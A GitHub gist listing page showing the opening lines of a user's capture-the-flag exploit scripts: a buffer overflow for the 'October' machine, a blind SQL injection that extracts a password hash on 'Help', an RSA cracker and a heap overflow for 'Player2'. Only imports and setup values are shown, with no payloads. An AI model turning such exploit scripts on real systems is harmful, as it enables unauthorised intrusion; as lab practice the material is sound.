Skip to content

Instantly share code, notes, and snippets.

View embe221ed's full-sized avatar
🚩
capturing the flags

embedded embe221ed

🚩
capturing the flags
View GitHub Profile
@embe221ed
embe221ed / october_exploit.py
Last active December 9, 2020 19:26
Buffer overflow exploit for machine October
from pwn import ELF, process, log
from pwnlib.util.packing import p32
# binary to exploit
FILE = './ovrflw'
BINARY = ELF(FILE)
# LOCAL VERSION
LIBC = ELF('/lib32/libc.so.6')
LIBC_OFFSET = 0xf7d36000
@embe221ed
embe221ed / blind_sqli.py
Created November 20, 2020 06:16
SQLi script used to get password hash for user help in Help HTB machine
import sys
import requests
from string import ascii_letters, digits, printable
URL = ''
COOKIES = {
'lang': 'english',
'PHPSESSID': '',
@embe221ed
embe221ed / crackRSA.py
Last active October 7, 2020 12:20
a python script which can be used for cracking simple RSA ciphers with known public key
#!/usr/bin/env python3
import argparse
import requests
from Crypto.PublicKey import RSA
from Crypto.Util.number import long_to_bytes
from base64 import b64decode
import gmpy
import sys
@embe221ed
embe221ed / player2_exploit.py
Last active December 9, 2020 19:26
heap overfl0w exploit for Player2 HTB machine
#!/usr/bin/python3
from pwn import ELF, process, context, log, ssh, u64, p64
BINARY = '/opt/Configuration_Utility/Protobs'
# BINARY = './re_protobs'
elf = ELF(BINARY)
LIBC_NAME = './Configuration_Utility/libc.so.6'
libc = ELF(LIBC_NAME)